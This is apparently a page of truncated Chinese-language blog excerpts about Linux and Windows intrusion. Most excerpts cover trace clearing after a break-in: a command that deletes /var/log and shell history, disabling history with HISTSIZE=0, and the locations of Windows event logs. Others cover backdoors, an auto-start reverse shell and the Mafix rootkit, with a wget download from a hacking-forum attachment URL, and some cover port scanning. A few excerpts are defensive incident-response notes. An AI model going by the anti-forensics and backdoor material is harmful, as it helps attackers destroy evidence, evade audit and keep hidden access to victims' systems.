rm -f -r /var/log/*rm .bash_historyrm recently_used…

清除history历史命令记录 vim ~/.bash_history //编辑history记录文件,删除部分不想被保存的历史命令 history -c //清除当前用户的history命令记录 HISTSIZE=0 //通过修改配置文件/etc/profile,使系统不再保存命令记录 清除系统日志痕迹 Linux 系统存在多种日志文件,来记录系统运行过程中产生的日志. /var/log/btmp 记录所有登录失败信息,使用lastb命令查看 /var/log/lastlog 记录系统中所有用…

Windows的日志文件通常有应用程序日志,安全日志.系统日志.DNS服务器日志.FTP日志.WWW日志等等. 应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT; 安全日志文件:%systemroot%\system32\config\SecEvent.EVT; 系统日志文件:%systemroot%\system32\config\SysEvent.EVT; DNS日志默认位置:%sys temroot%\system32\config,默认…

后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号. URL:http://forum.eviloctal.com/attachment.php?aid=13419 安装及使用: wget http://forum.eviloctal.com/attachme…

安全运维之:Linux后门入侵检测工具的使用 https://blog.csdn.net/exitgogo/article/details/39547113…

当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失. 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路. 一.入侵排查思路 本次linux系统版本为:centos6.5 1.账号安全 用户信息文件 cat /etc//passwd ,如果里面内容比较多使用more  /etc…

1.痕迹清理的基本概念 在渗透测试的过程结束后清理自己在从开始接触到目标计算机是开始所有操作的痕迹 2.痕迹清理的目的 为下一步的渗透测试拖延时间 提高隐蔽性 所有的痕迹清理都不是绝对的,只要和计算机有接触就一定会有痕迹 第三方日志记录平台结构对于痕迹清理是基本无解的安全方案 3.windows痕迹记录的基本机制 4.windows痕迹清理的注意事项 基本结构:时间.用户.地点.操作…

背景说明 扫描是一切入侵的基础,通过扫描来发现目标主机是否为活动主机.操作系统是什么版本.开放了哪些服务等.扫描技术纷繁复杂,新的扫描技术也层出不穷,不可能穷举所有扫描技术,下面按入侵步骤对主机扫描.端口扫描和服务扫描技术做一个简要分类与概述. 活动主机扫描可分为两类:1)ICMP echo扫描与Broadcast ICMP扫描:端口扫描也分为两类:1)开放扫描,这类扫描会产生大量的审计数据,容易被对方发现,但其可靠性高(例如TCP connect扫描):2)秘密扫描,这类扫描能有效的避免对方入…

在Linux系统中/tmp文件夹下的文件是会被清理.删除的,文件清理的规则是如何设定的呢? 以Redhat为例,这个主要是因为作业里面会调用tmpwatch命令删除那些一段时间没有访问的文件. 那么什么是tmpwatch呢?其实tmpwatch是一个命令或者说是一个包.如下所示 tmpwatch - removes files which haven't been accessed for a period of time [root@DB-Server ~]# rpm -qa | grep t…

mysql会给出我们最近执行的SQL命令和脚本:同linux command保存在~/.bash_history一样,你用mysql连接MySQL server的所有操作也会被记录到~/.mysql_history文件中,这样就会有很大的安全风险了,如添加MySQL用户的sql也同样会被明文记录到此文件中. 1,查看你系统的~/.mysql_history隐藏文件 (我的测试环境下,一般linux的mysql用户来管理,所以在/home/mysql目录下会有这个文件) -bash-3.2$ ls…